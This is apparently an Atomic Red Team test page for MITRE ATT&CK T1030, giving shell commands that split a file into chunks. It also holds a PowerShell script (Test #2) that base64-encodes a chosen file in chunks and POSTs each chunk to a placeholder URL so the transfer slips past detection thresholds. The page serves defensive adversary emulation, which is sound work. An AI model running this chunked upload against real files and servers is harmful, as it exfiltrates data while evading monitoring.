# T1030 - Data Transfer Size Limits
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1030)
<blockquote>

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)

- [Atomic Test #2 - Network-Based Data Transfer in Small Chunks](#atomic-test-2---network-based-data-transfer-in-small-chunks)


<br/>

## Atomic Test #1 - Data Transfer Size Limits
Take a file/directory, split it into 5Mb chunks

**Supported Platforms:** macOS, Linux


**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name | path | T1030_urandom|
| folder_path | Path where the test creates artifacts | path | /tmp/T1030|


#### Attack Commands: Run with `sh`! 


```sh
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
```

#### Cleanup Commands:
```sh
if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
```



#### Dependencies:  Run with `sh`!
##### Description: The file must exist for the test to run.
##### Check Prereq Commands:
```sh
if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
```
##### Get Prereq Commands:
```sh
if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1
```




<br/>
<br/>

## Atomic Test #2 - Network-Based Data Transfer in Small Chunks
Simulate transferring data over a network in small chunks to evade detection.

**Supported Platforms:** Windows


**auto_generated_guid:** f0287b58-f4bc-40f6-87eb-692e126e7f8f





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_file_path | Path to the source file to transfer. | path | [User specified]|
| destination_url | URL of the destination server. | url | http://example.com|
| chunk_size | Size of each data chunk (in KB). | integer | 1024|


#### Attack Commands: Run with `powershell`! 


```powershell
$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize

while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()
```






<br/>